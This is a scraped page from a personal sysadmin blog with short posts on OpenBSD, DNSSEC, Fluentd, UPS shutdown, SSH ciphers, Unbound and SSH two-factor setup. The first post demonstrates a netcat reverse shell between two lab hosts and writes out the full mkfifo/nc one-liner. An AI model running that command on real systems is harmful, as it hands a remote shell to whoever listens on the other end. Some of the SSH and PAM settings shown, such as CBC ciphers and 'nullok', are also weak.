Blog

sha256: 2b87a252a3d912530dd8c20df6bee7f6cbc4ede0074fdf217e318aab39d9736c

OpenBSD - ReverseShell

Security, OpenBSD

Reverse Shells

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)

Any Comments ?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

DNSSEC - OARC Size Tester

DNS, Security

Talk from @mwl at BSDCAN 2022

https://www.youtube.com/watch?v=1n62VZj-CKI

OARC Reply Size Tester

dig +short rs.dns-oarc.net TXT

Host1 - good :)

# dig +short rs.dns-oarc.net TXT
rst.x4090.rs.dns-oarc.net.
rst.x4058.x4090.rs.dns-oarc.net.
rst.x4064.x4058.x4090.rs.dns-oarc.net.
"45.15.80.80 DNS reply size limit is at least 4090"
"45.15.80.80 sent EDNS buffer size 4096"

Host2 - bad :(

# dig +short rs.dns-oarc.net TXT
rst.x1196.rs.dns-oarc.net.
rst.x1206.x1196.rs.dns-oarc.net.
rst.x1204.x1206.x1196.rs.dns-oarc.net.
"74.63.25.240 DNS reply size limit is at least 1206"
"74.63.25.240 sent EDNS buffer size 1232"
Any Comments ?

sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Fluent - Data Collector

Monitoring

Fluentd is an open-source data collector for a unified logging layer. Fluentd allows you to unify data collection and consumption for better use and understanding of data.

Docu

Install Ruby

pkg_add ruby-3.1.2

ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby
ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle
ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler
ln -sf /usr/local/bin/erb31 /usr/local/bin/erb
ln -sf /usr/local/bin/gem31 /usr/local/bin/gem
ln -sf /usr/local/bin/irb31 /usr/local/bin/irb
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc
ln -sf /usr/local/bin/rake31 /usr/local/bin/rake
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg
ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc
ln -sf /usr/local/bin/ri31 /usr/local/bin/ri
ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof

Install Fluentd

gem install fluentd

ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd

Create Config

fluentd --setup /etc/fluent

Edit config

cat << 'EOF ' > /etc/fluent/fluent.conf
# fluent.conf

# Nginx Log
<source>
  @type tail
  format nginx
  path /var/log/nginx/blog.stoege.net.log
  pos_file /var/log/nginx-pos/blog.stoege.net.log
  time_key fluentd_time
  time_format %d/%b/%Y:%H:%M:%S %z
  tag nginx.access
</source>

# Output
<match nginx.access>
  @type file
  path /var/log/fluent/blog.stoege.net
</match>
EOF

Run

fluentd -c /etc/fluent/fluent.conf

Sample Data

tail -f /var/log/fluent/blog.stoege.net/buffer.b5e6e8e8ee14db5e3a401bb38f14a6de5.log
2022-08-23T15:54:58+02:00	nginx.access	{"remote":"114.119.135.215","host":"-","user":"-","time":"23/Aug/2022:15:54:58 +0200","method":"GET","path":"/tags/monitoring/","code":"200","size":"33684","referer":"https://blog.stoege.net/tags/vpn","agent":"Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)","http_x_forwarded_for":"-"}
2022-08-23T15:55:42+02:00	nginx.access	{"remote":"147.182.168.107","host":"-","user":"-","time":"23/Aug/2022:15:55:41 +0200","method":"GET","path":"/index.xml","code":"304","size":"0","referer":"-","agent":"NewsBlur Feed Fetcher - 2 subscribers - https://www.newsblur.com/site/8313934/blog-stoege-net (\\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\\x22)","http_x_forwarded_for":"-"}
2022-08-23T15:55:42+02:00	nginx.access	{"remote":"147.182.168.107","host":"-","user":"-","time":"23/Aug/2022:15:55:42 +0200","method":"GET","path":"/","code":"200","size":"56891","referer":"-","agent":"NewsBlur Page Fetcher - 2 subscribers - https://www.newsblur.com/site/8313934/blog-stoege-net (\\x22Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15\\x22)","http_x_forwarded_for":"-"}
Any Comments ?

sha256: fb02e126f5e34e4be8630c5190e9af68d2c36e91e5c4d54a11f6b70a3be6563b

Sensorsd - UPS Shutdown

OpenBSD

Shutdown Hosts on Power Outages

Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that.

Connection UPS to APU via USB Cable

dmesg show the UPS connected

APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1
...
uhid21 at uhidev0 reportid 142: input=0, output=0, feature=4

Check sysctl

what kind of information do we get from the hardware sensor ?

SSH - Cipher, Key, MAC

OpenBSD

SSH Stuff

Supported Ciphers, Key, MAC on OpenBSD 7.1. Not all of them are good for useage, here is my recommendation.

for your sshd_config / ssh_config

Ciphers                aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes128-cbc

HostKeyAlgorithms      ssh-ed25519,[email protected],[email protected],
                       [email protected],rsa-sha2-512,rsa-sha2-256

Kexalgorithms          [email protected],diffie-hellman-group16-sha512,
                       diffie-hellman-group18-sha512,diffie-hellman-group14-sha256

MACs                   [email protected],[email protected]

PubKeyAcceptedKeyTypes ssh-ed25519,[email protected],[email protected],
                       [email protected],[email protected],
                       [email protected],[email protected],rsa-sha2-512,rsa-sha2-25

List of all available Types

Cipher

ssh -Q cipher

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
aes128-ctr
aes192-ctr
aes256-ctr
[email protected]
[email protected]
[email protected]

HostbasedAcceptedAlgorithms

ssh -Q HostbasedAcceptedAlgorithms

ssh-ed25519
[email protected]
[email protected]
[email protected]
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

HostKeyAlgorithms

ssh -Q HostKeyAlgorithms

ssh-ed25519
[email protected]
[email protected]
[email protected]
ssh-rsa
rsa-sha2-256
rsa-sha2-512
ssh-dss
ecdsa-sha2-nistp256
ecdsa-sha2-nistp384
ecdsa-sha2-nistp521
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

KexAlgorithms

ssh -Q KexAlgorithms

diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
[email protected]
[email protected]
diffie-hellman-group1-sha1
diffie-hellman-group14-sha1
diffie-hellman-group14-sha256
diffie-hellman-group16-sha512
diffie-hellman-group18-sha512
diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
ecdh-sha2-nistp256
ecdh-sha2-nistp384
ecdh-sha2-nistp521
curve25519-sha256
[email protected]
[email protected]

MAC

Message Authentication Code

OpenBSD - Full Disk Encryption

OpenBSD, Security

Intro

I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines. And there, we have FileVault which basically does the same. However, i’d like to give a try with a Test VM. There are plenty of instructions how to setup up, i just tried one and made some notes as usual.

JC - JSON from CLI

OpenBSD

how to build json from cli

we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping

add package

doas pkg_add jc

try ping

openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null
{
  "destination_ip": "1.1.1.1",
  "data_bytes": 56,
  "pattern": null,
  "destination": "1.1.1.1",
  "packets_transmitted": 3,
  "packets_received": 3,
  "packet_loss_percent": 0.0,
  "duplicates": 0,
  "round_trip_ms_min": 9.219,
  "round_trip_ms_avg": 9.826,
  "round_trip_ms_max": 10.158,
  "round_trip_ms_stddev": 0.43,
  "responses": [
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 0,
      "ttl": 59,
      "time_ms": 10.158,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 1,
      "ttl": 59,
      "time_ms": 9.219,
      "duplicate": false
    },
    {
      "type": "reply",
      "bytes": 64,
      "response_ip": "1.1.1.1",
      "icmp_seq": 2,
      "ttl": 59,
      "time_ms": 10.101,
      "duplicate": false
    }
  ]
}

Compatible platforms: linux, darwin, freebsd -> had to redirect the stderr to /dev/null because OpenBSD is not (yet) supported officially…

Unbound - Logging

OpenBSD

Enable Logging for Unbound

update unbound.conf

/var/unbound/etc/unbound.conf

server:
    logfile: /log/unbound.log
    verbosity: 1
    log-queries: yes
...

create folder/logfile

log=/var/unbound/log/unbound.log
doas mkdir /var/unbound/log/
touch $log
chmod 660 $log
chown _unbound:_unbound $log

restart service

doas rcctl restart unbound

tail logfile

tail -f /var/unbound/log/unbound.log

# tail -f /var/unbound/log/unbound.log
[1660208341] unbound[3279:0] notice: init module 0: validator
[1660208341] unbound[3279:0] notice: init module 1: iterator
[1660208341] unbound[3279:0] info: start of service (unbound 1.15.0).
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. A IN
[1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.euro.apple.com. AAAA IN
Any Comments ?

sha256: 2a8843dffec0d8bbd8ff1b2ab4748600dfc57ba00bd87707e1f505c849b89fa3

Unbound - RemoteControl

OpenBSD

How to Enable Remote Control for Unbound

Setup Remote Control

doas unbound-control-setup

$ doas unbound-control-setup
setup in directory /var/unbound/etc
Generating RSA private key, 3072 bit long modulus
..................................++++
..................................++++
e is 010001 (0x65537)
Generating RSA private key, 3072 bit long modulus
........................................++++
........................................++++
e is 010001 (0x65537)
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
removing artifacts
Setup success. Certificates created. Enable in unbound.conf file to use

Enable in unbound.conf

/var/unbound/etc/unbound.conf

OpenSSH 2FA Google Auth

OpenBSD

Let’s give a try with Alpine Linux, OpenSSH and 2FA with Google Authenticator.

add Packages

apk add openssh openssh-server-pam google-authenticator openssh-doc google-authenticator-doc libqrencode

Configure GoogleAuth

touch /etc/pam.d/sshd
ln /etc/pam.d/sshd /etc/pam.d/sshd.pam

cat << 'EOF' >> /etc/pam.d/sshd.pam
account   include     base-account

auth      required    pam_env.so
auth      required    pam_nologin.so  successok
auth      required    /lib/security/pam_google_authenticator.so   echo_verification_code grace_period=57600 nullok
auth      required    pam_unix.so   md5 sha512
EOF

update sshd_config

cat << 'EOF' >> /etc/ssh/sshd_config
PasswordAuthentication no
AuthenticationMethods any
UsePAM yes
EOF

Restart SSHD

service sshd restart

Setup User

su - USERNAME
google-authenticator

Response